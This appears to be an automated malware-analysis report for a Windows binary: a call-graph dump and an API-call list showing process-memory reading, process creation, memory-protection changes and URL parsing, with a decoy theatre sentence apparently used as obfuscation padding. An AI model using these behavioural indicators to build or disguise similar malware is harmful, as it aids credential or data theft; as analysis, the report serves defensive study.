14025->14026 14027 407cea 14026->14027 14028 4075d0 13 API calls 14027->14028 14029 407cf9 14028->14029 14030 4075d0 13 API calls 14029->14030 14031 407d08 14030->14031 14032 4075d0 13 API calls 14031->14032 14033 407d17 14032->14033 14034 4075d0 13 API calls 14033->14034 14035 407d26 14034->14035 14036 4075d0 13 API calls 14035->14036 14037 407d35 14036->14037 14038 4075d0 13 API calls 14037->14038 14039 407d44 14038->14039 14040 4075d0 13 API calls 14039->14040 14041 407d53 14040->14041 14042 4075d0 13 API calls 14041->14042 14043 407d62 14042->14043 14044 4075d0 13 API calls 14043->14044 14045 407d71 14044->14045 14046 4075d0 13 API calls 14045->14046 14047 407d80 14046->14047 14048 4075d0 13 API calls 14047->14048 14049 407d8f 14048->14049 14050 4075d0 13 API calls 14049->14050 14051 407d9e 14050->14051 14052 4075d0 13 API calls 14051->14052 14053 407dad 14052->14053 14054 4075d0 13 API calls 14053->14054 14055 407dbc 14054->14055 14056 4075d0 13 API calls 14055->14056 14057 407dcb 14056->14057 14058 4075d0 13 API calls 14057->14058 14059 407dda 14058->14059 14060 4075d0 13 API calls 14059->14060 14061 407de9 codecvt 14060->14061 14062 415190 7 API calls 14061->14062 14063 407e77 codecvt 14061->14063 14062->14063 14063->13189 14065 41506a codecvt 14064->14065 14066 414910 7 API calls 14065->14066 14067 4150dd codecvt 14066->14067 14067->13191 14070 419027 codecvt 14068->14070 14069 41904d 14069->13184 14070->14069 14705 418f30 14070->14705 14072 419140 14072->14069 14073 415190 7 API calls 14072->14073 14073->14069 14080 401030 14074->14080 14077 404838 14078 404848 InternetCrackUrlA 14077->14078 14079 404867 14078->14079 14079->13866 14081 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 14080->14081 14081->14077 14082->13885 14083->13891 14084->13897 14086 4151b5 14085->14086 14089 405100 14086->14089 14088 4151cf 14088->13910 14090 405119 14089->14090 14091 4047b0 4 API calls 14090->14091 14093 405125 14091->14093 14092 40580d codecvt 14092->14088 14093->14092 14094 405787 memcpy 14093->14094 14095 4057a8 14094->14095 14096 4057af memcpy 14095->14096 14097 4057c7 14096->14097 14098 4057e7 memcpy 14097->14098 14098->14092 14137 409880 ??2@YAPAXI 14099->14137 14101 4098e1 14101->13917 14103 40fb16 14102->14103 14104 40fc33 14103->14104 14151 409ce0 14103->14151 14157 40be70 14104->14157 14107 40fc9a 14168 40ec30 14107->14168 14109 40fd0c 14109->13926 14112 40fd76 14110->14112 14111 40fefa 14114 40be70 24 API calls 14111->14114 14112->14111 14113 409ce0 2 API calls 14112->14113 14113->14111 14115 40ff61 14114->14115 14116 40ec30 7 API calls 14115->14116 14117 40ffd3 14116->14117 14117->13924 14119 410046 14118->14119 14121 41021e 14119->14121 14234 4126c0 14119->14234 14121->13923 14122 410138 14122->14121 14248 40da80 14122->14248 14124 41019f 14256 40f6b0 14124->14256 14127 410266 14126->14127 14128 41030f strtok_s 14127->14128 14129 4106ee 14127->14129 14133 410334 14128->14133 14129->13920 14130 41068a 14132 415190 7 API calls 14130->14132 14131 4188e0 malloc strncpy 14131->14133 14134 4106c4 14132->14134 14133->14130 14133->14131 14136 41066f strtok_s 14133->14136 14135 4106d5 memset 14134->14135 14135->14129 14136->14133 14140 406fb0 14137->14140 14139 4098ad codecvt 14139->14101 14143 406d40 14140->14143 14142 406fd8 14142->14139 14144 406d63 14143->14144 14146 406d59 14143->14146 14144->14146 14147 4069b0 14144->14147 14146->14142 14148 4069c9 14147->14148 14150 4069d5 14147->14150 14149 406aad memcpy 14148->14149 14148->14150 14149->14150 14150->14146 14153 409d03 14151->14153 14152 409dba 14152->14104 14153->14152 14154 409d87 memcmp 14153->14154 14154->14152 14155 409d9f 14154->14155 14172 409b60 14155->14172 14162 40be86 14157->14162 14158 40bf04 14158->14107 14160 40be70 24 API calls 14160->14162 14161 40a790 24 API calls 14161->14162 14162->14158 14162->14160 14162->14161 14164 415190 7 API calls 14162->14164 14176 40a260 14162->14176 14182 40aef0 14162->14182 14186 40b4f0 14162->14186 14192 40ba80 14162->14192 14198 40b230 14162->14198 14164->14162 14171 40ec3f 14168->14171 14169 40ecf9 14169->14109 14171->14169 14230 40e430 14171->14230 14173 409b8a 14172->14173 14174 409bcf 14173->14174 14175 409bb6 memcpy 14173->14175 14174->14152 14175->14174 14180 40a276 14176->14180 14177 40a6b3 14179 415190 7 API calls 14177->14179 14178 40a6f7 14178->14162 14179->14178 14180->14177 14180->14178 14202 409e10 14180->14202 14185 40af06 14182->14185 14183 415190 7 API calls 14184 40b1b9 14183->14184 14184->14162 14185->14183 14185->14184 14191 40b506 14186->14191 14187 40b9b9 14188 415190 7 API calls 14187->14188 14189 40ba11 14187->14189 14188->14189 14189->14162 14190 409e10 15 API calls 14190->14191 14191->14187 14191->14189 14191->14190 14197 40ba96 14192->14197 14193 409e10 15 API calls 14193->14197 14194 40bd9c 14195 415190 7 API calls 14194->14195 14196 40bdf4 14194->14196 14195->14196 14196->14162 14197->14193 14197->14194 14197->14196 14199 40b246 14198->14199 14200 415190 7 API calls 14199->14200 14201 40b47d 14199->14201 14200->14201 14201->14162 14203 409e94 14202->14203 14204 409e1f memcmp 14202->14204 14205 409ea1 memcmp 14203->14205 14210 409e61 14203->14210 14204->14203 14208 409e3a 14204->14208 14206 409ec0 14205->14206 14205->14210 14207 409ee0 memset 14206->14207 14206->14210 14207->14210 14211 410a60 14208->14211 14210->14180 14221 410a79 14211->14221 14212 410c00 memset 14225 41aad0 14212->14225 14214 410c2d lstrcatA lstrcatA 14226 41aad0 14214->14226 14216 410c55 lstrcatA lstrcatA 14227 41aad0 14216->14227 14218 410c80 lstrcatA lstrcatA lstrlenA 14228 418ea0 14218->14228 14220 410cc2 memset memset 14222 410d0c 14220->14222 14221->14212 14223 410d57 CreateProcessA WaitForSingleObject 14222->14223 14224 410d77 14223->14224 14224->14210 14225->14214 14226->14216 14227->14218 14229 418ea9 codecvt 14228->14229 14229->14220 14232 40e44d 14230->14232 14231 40e4b1 14231->14171 14232->14231 14233 40de10 7 API calls 14232->14233 14233->14232 14235 4126d6 14234->14235 14247 412c1b 14234->14247 14262 4060a0 14235->14262 14237 412b61 14238 4060a0 4 API calls 14237->14238 14239 412b88 14238->14239 14240 4060a0 4 API calls 14239->14240 14241 412bac 14240->14241 14242 4060a0 4 API calls 14241->14242 14243 412bd3 14242->14243 14244 4060a0 4 API calls 14243->14244 14245 412bf7 14244->14245 14246 4060a0 4 API calls 14245->14246 14246->14247 14247->14122 14252 40da96 14248->14252 14249 40dafa 14249->14124 14252->14249 14255 40da80 11 API calls 14252->14255 14266 40cef0 14252->14266 14272 40d400 14252->14272 14276 40c990 14252->14276 14284 40d780 14252->14284 14255->14252 14260 40f6c6 14256->14260 14257 40f72d 14257->14121 14258 40f6b0 8 API calls 14258->14260 14260->14257 14260->14258 14288 4194d0 14260->14288 14292 40f4a0 14260->14292 14263 4060b9 14262->14263 14264 4047b0 4 API calls 14263->14264 14265 4060c5 codecvt 14264->14265 14265->14237 14271 40cf06 14266->14271 14267 40d380 memset 14268 40d391 14267->14268 14268->14252 14269 415190 7 API calls 14270 40d36f 14269->14270 14270->14267 14271->14267 14271->14268 14271->14269 14275 40d416 14272->14275 14273 40d6e7 14273->14252 14274 415190 7 API calls 14274->14273 14275->14273 14275->14274 14278 40c9a4 14276->14278 14277 40ce7f 14277->14252 14278->14277 14279 40caae ??2@YAPAXI 14278->14279 14283 40cadf 14279->14283 14280 40ce3b 14281 415190 7 API calls 14280->14281 14281->14277 14282 40c820 memset memcpy 14282->14283 14283->14280 14283->14282 14286 40d796 14284->14286 14285 40d9ee 14285->14252 14286->14285 14287 415190 7 API calls 14286->14287 14287->14285 14296 41d830 14288->14296 14291 419503 14291->14260 14294 40f4bf 14292->14294 14293 40f653 14293->14260 14294->14293 14298 40f300 14294->14298 14297 4194dd memset 14296->14297 14297->14291 14299 40f313 14298->14299 14301 40f43c 14299->14301 14302 40ed20 14299->14302 14301->14293 14305 40ed31 14302->14305 14303 40ed6a 14303->14301 14304 415190 7 API calls 14304->14305 14305->14303 14305->14304 14306 40ed20 7 API calls 14305->14306 14306->14305 14307->13930 14309 4016e6 codecvt 14308->14309 14310 401932 14309->14310 14311 415190 7 API calls 14309->14311 14310->13938 14311->14309 14313 401344 14312->14313 14314 415190 7 API calls 14313->14314 14315 4014d2 14313->14315 14317 40152a 14313->14317 14314->14315 14316 40150b memset 14315->14316 14316->14317 14317->13937 14318->13942 14326 41aad0 14319->14326 14321 413caa strtok_s 14322 413cbe 14321->14322 14323 413d32 codecvt 14322->14323 14325 413d47 strtok_s 14322->14325 14327 4138b0 14322->14327 14323->13948 14325->14322 14326->14321 14330 4138d2 codecvt __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14327->14330 14328 413909 14328->14322 14329 4138b0 7 API calls 14329->14330 14330->14328 14330->14329 14331 415190 7 API calls 14330->14331 14331->14330 14332->13952 14334 412e46 14333->14334 14335 413398 14334->14335 14337 413047 14334->14337 14338 4131e5 14334->14338 14341 41315a 14334->14341 14336 4060a0 4 API calls 14335->14336 14336->14341 14339 4060a0 4 API calls 14337->14339 14340 4060a0 4 API calls 14338->14340 14339->14341 14340->14341 14341->13956 14343 413ec9 codecvt 14342->14343 14344 413eef codecvt 14343->14344 14345 415190 7 API calls 14343->14345 14344->13960 14345->14343 14347 4172fe 14346->14347 14350 4170d0 ??_U@YAPAXI 14347->14350 14349 41730d 14349->13974 14365 41a740 14350->14365 14352 417111 OpenProcess 14353 41712b 14352->14353 14362 417148 allocator 14352->14362 14353->14349 14354 417155 memset 14367 416f00 strlen ??_U@YAPAXI 14354->14367 14355 4172ae ??_V@YAXPAX 14355->14353 14357 4171d9 ReadProcessMemory 14357->14362 14358 4171c5 14358->14355 14361 408060 memcpy codecvt 14361->14362 14362->14354 14362->14355 14362->14357 14362->14358 14362->14361 14363 417275 14362->14363 14374 417320 14362->14374 14380 416b60 14362->14380 14394 408060 14363->14394 14366 41a750 14365->14366 14366->14352 14397 416bd0 strlen 14367->14397 14369 416f84 VirtualQueryEx 14370 4170a9 ??_V@YAXPAX 14369->14370 14373 416f6c 14369->14373 14371 417008 14370->14371 14371->14362 14372 416de0 ReadProcessMemory 14372->14373 14373->14369 14373->14371 14373->14372 14375 417331 allocator 14374->14375 14401 408290 14375->14401 14377 417345 14405 408260 14377->14405 14381 417320 9 API calls 14380->14381 14382 416b73 14381->14382 14484 4173a0 14382->14484 14385 416b8f 14488 4173d0 14385->14488 14386 416bae 14492 409540 14386->14492 14391 408060 codecvt memcpy 14393 416ba9 14391->14393 14392 408060 codecvt memcpy 14392->14393 14393->14362 14395 408290 codecvt memcpy 14394->14395 14396 408073 task 14395->14396 14396->14353 14398 416c01 strlen 14397->14398 14399 416d60 14398->14399 14400 416c17 14398->14400 14399->14373 14400->14398 14402 4082a3 14401->14402 14404 4082a1 codecvt task 14401->14404 14402->14404 14410 4071e0 memcpy 14402->14410 14404->14377 14411 4071c0 strlen 14405->14411 14407 408270 14412 4085f0 14407->14412 14409 408280 14409->14362 14410->14404 14411->14407 14413 408603 14412->14413 14414 40862a 14413->14414 14415 40860a codecvt 14413->14415 14434 408cd0 14414->14434 14421 408c10 14415->14421 14417 408628 codecvt 14417->14409 14419 408638 codecvt 14419->14417 14443 4071e0 memcpy 14419->14443 14422 408c21 allocator 14421->14422 14424 408c2e allocator 14422->14424 14444 4086e0 14422->14444 14425 408c52 14424->14425 14426 408c77 14424->14426 14447 408f40 14425->14447 14428 408cd0 allocator 7 API calls 14426->14428 14432 408c85 codecvt 14428->14432 14429 408c67 14430 408f40 allocator 6 API calls 14429->14430 14431 408c75 codecvt 14430->14431 14431->14417 14432->14431 14453 4071e0 memcpy 14432->14453 14435 408ce1 allocator 14434->14435 14436 408cee 14435->14436 14462 408db0 14435->14462 14438 408cf9 14436->14438 14441 408d0e 14436->14441 14465 409010 14438->14465 14440 408d0c codecvt 14440->14419 14441->14440 14442 408290 codecvt memcpy 14441->14442 14442->14440 14443->14417 14454 41d930 14444->14454 14448 408f54 14447->14448 14450 408f5c codecvt 14447->14450 14449 4086e0 allocator 5 API calls 14448->14449 14449->14450 14452 408fa9 codecvt 14450->14452 14461 407200 memmove 14450->14461 14452->14429 14453->14431 14455 41ab69 std::exception::exception strlen malloc strcpy_s 14454->14455 14456 41d94a 14455->14456 14457 41d9a4 __CxxThrowException@8 RaiseException 14456->14457 14458 41d95f 14457->14458 14459 41abf7 std::exception::exception strlen malloc strcpy_s free 14458->14459 14460 4086f1 14459->14460 14460->14424 14461->14452 14473 41d8e3 14462->14473 14466 409046 allocator 14465->14466 14480 4091d0 14466->14480 14468 409140 14469 408290 codecvt memcpy 14468->14469 14471 40914f codecvt 14469->14471 14470 4090be codecvt 14470->14468 14483 4071e0 memcpy 14470->14483 14471->14440 14474 41ab69 std::exception::exception strlen malloc strcpy_s 14473->14474 14475 41d8fd 14474->14475 14476 41d9a4 __CxxThrowException@8 RaiseException 14475->14476 14477 41d912 14476->14477 14478 41abf7 std::exception::exception strlen malloc strcpy_s free 14477->14478 14479 408dc1 14478->14479 14479->14436 14481 4093e0 allocator 5 API calls 14480->14481 14482 4091e2 14481->14482 14482->14470 14483->14468 14485 4173af codecvt allocator 14484->14485 14498 417460 14485->14498 14487 416b81 14487->14385 14487->14386 14489 4173e5 14488->14489 14503 417410 14489->14503 14493 409558 allocator 14492->14493 14494 408290 codecvt memcpy 14493->14494 14495 40956c 14494->14495 14496 408c10 allocator 8 API calls 14495->14496 14497 40957c 14496->14497 14497->14392 14499 4174be codecvt 14498->14499 14501 417474 codecvt 14498->14501 14499->14487 14501->14499 14502 416b40 memchr 14501->14502 14502->14501 14504 417425 allocator 14503->14504 14505 408290 codecvt memcpy 14504->14505 14506 417439 14505->14506 14507 408c10 allocator 8 API calls 14506->14507 14508 416ba1 14507->14508 14508->14391 14510 414586 14509->14510 14511 4145d2 codecvt 14510->14511 14513 414699 codecvt 14510->14513 14515 414280 memset memset 14510->14515 14511->13980 14513->14511 14514 415190 7 API calls 14513->14514 14514->14511 14516 4142da 14515->14516 14517 409ce0 2 API calls 14516->14517 14520 41448e codecvt 14516->14520 14518 414390 codecvt 14517->14518 14519 409e10 15 API calls 14518->14519 14518->14520 14519->14520 14520->14510 14524 414932 codecvt 14521->14524 14522 414958 14522->13984 14523 414910 7 API calls 14523->14524 14524->14522 14524->14523 14525 415190 7 API calls 14524->14525 14525->14524 14531 4072d0 14526->14531 14529 407700 14529->14016 14530 4075eb 14546 408120 14530->14546 14532 4072dd 14531->14532 14533 4072ee memset 14532->14533 14544 407340 14533->14544 14534 407540 14571 4080e0 14534->14571 14537 408120 task memcpy 14538 40755a 14537->14538 14538->14530 14540 408080 9 API calls 14540->14544 14544->14534 14544->14540 14545 409220 strcpy_s 14544->14545 14549 407570 14544->14549 14554 409240 vsprintf_s 14544->14554 14555 408160 14544->14555 14566 4075a0 14544->14566 14545->14544 14547 4084d0 task memcpy 14546->14547 14548 40812f task 14547->14548 14548->14529 14575 408030 14549->14575 14552 408030 memcpy 14553 40758d 14552->14553 14553->14544 14554->14544 14556 408172 construct 14555->14556 14557 408202 14556->14557 14561 408185 construct 14556->14561 14558 40821a 14557->14558 14559 408460 9 API calls 14557->14559 14590 409270 14558->14590 14559->14558 14560 4081b9 14586 4092b0 14560->14586 14561->14560 14579 408460 14561->14579 14564 4081ee 14564->14544 14567 408060 codecvt memcpy 14566->14567 14568 4075b2 14567->14568 14569 408060 codecvt memcpy 14568->14569 14570 4075bd 14569->14570 14570->14544 14572 4080f8 construct allocator 14571->14572 14663 408330 14572->14663 14574 40754f 14574->14537 14576 408041 allocator 14575->14576 14577 408290 codecvt memcpy 14576->14577 14578 407582 14577->14578 14578->14552 14580 408471 14579->14580 14581 408484 14580->14581 14584 40848e 14580->14584 14594 408b30 14581->14594 14583 40848c 14583->14560 14584->14583 14597 408820 14584->14597 14587 4092bc construct 14586->14587 14647 409490 14587->14647 14591 40927c construct 14590->14591 14656 409470 14591->14656 14595 41d8e3 std::_Xinvalid_argument 5 API calls 14594->14595 14596 408b41 14595->14596 14596->14583 14598 40884d 14597->14598 14599 408852 14598->14599 14600 40885f 14598->14600 14601 408b30 5 API calls 14599->14601 14606 40885a task 14600->14606 14608 408e60 14600->14608 14601->14606 14605 4088a2 14605->14606 14614 408aa0 14605->14614 14606->14583 14617 409380 14608->14617 14611 4092d0 14631 4095a0 14611->14631 14639 409300 14614->14639 14618 40939c 14617->14618 14619 40887f 14617->14619 14620 4093a5 ??2@YAPAXI 14618->14620 14621 4093be 14618->14621 14619->14611 14620->14619 14620->14621 14625 407130 14621->14625 14626 41ab69 std::exception::exception strlen malloc strcpy_s 14625->14626 14627 407143 14626->14627 14628 41d9a4 14627->14628 14629 41d9d9 RaiseException 14628->14629 14630 41d9cd 14628->14630 14629->14619 14630->14629 14632 4095b1 _Copy_impl 14631->14632 14635 409730 14632->14635 14636 40975f 14635->14636 14637 4092ef 14636->14637 14638 4092b0 construct 8 API calls 14636->14638 14637->14605 14638->14636 14640 409311 _Copy_impl 14639->14640 14643 409600 14640->14643 14644 409605 14643->14644 14645 408abb 14644->14645 14646 4097f0 task memcpy 14644->14646 14645->14606 14646->14644 14649 4094a4 construct allocator 14647->14649 14648 4092cc 14648->14564 14649->14648 14651 4094e0 14649->14651 14652 409540 allocator 8 API calls 14651->14652 14653 409503 14652->14653 14654 409540 allocator 8 API calls 14653->14654 14655 409515 14654->14655 14655->14648 14659 409670 14656->14659 14661 409687 construct allocator 14659->14661 14660 40928c 14660->14564 14661->14660 14662 4094e0 allocator 8 API calls 14661->14662 14662->14660 14664 408346 14663->14664 14669 408341 std::error_category::default_error_condition 14663->14669 14665 4083c7 14664->14665 14666 40836f 14664->14666 14687 4084d0 14665->14687 14672 408a50 14666->14672 14669->14574 14670 408377 construct 14670->14669 14676 408700 14670->14676 14673 408a65 14672->14673 14691 408dd0 14673->14691 14677 408712 construct 14676->14677 14678 4087af 14677->14678 14680 408729 construct 14677->14680 14679 408460 9 API calls 14678->14679 14681 4087c7 construct 14678->14681 14679->14681 14682 408460 9 API calls 14680->14682 14684 40875d construct 14680->14684 14683 4092b0 construct 8 API calls 14681->14683 14682->14684 14685 40879b 14683->14685 14686 4092b0 construct 8 API calls 14684->14686 14685->14670 14686->14685 14688 4084df task 14687->14688 14690 4084fc task 14687->14690 14689 408aa0 task memcpy 14688->14689 14689->14690 14690->14669 14692 408de9 std::error_category::default_error_condition 14691->14692 14693 408a8f 14692->14693 14697 409340 14692->14697 14693->14670 14696 408aa0 task memcpy 14696->14693 14698 409351 _Copy_impl 14697->14698 14701 409630 14698->14701 14703 409635 construct 14701->14703 14702 408e20 14702->14696 14703->14702 14704 4096c0 _Copy_impl 8 API calls 14703->14704 14704->14703 14706 418f59 14705->14706 14707 418f67 malloc 14706->14707 14708 418f5f 14706->14708 14707->14708 14709 418f85 14707->14709 14708->14072 14709->14708 14710 418fcd memset 14709->14710 14710->14708 15115 416af3 15116 416ab1 15115->15116 15117 415b10 146 API calls 15116->15117 15118 416b16 15117->15118

                                                Control-flow Graph

                                                APIs
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                • strlen.MSVCRT ref: 004046F0
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                • VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 0040479C
                                                Strings
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
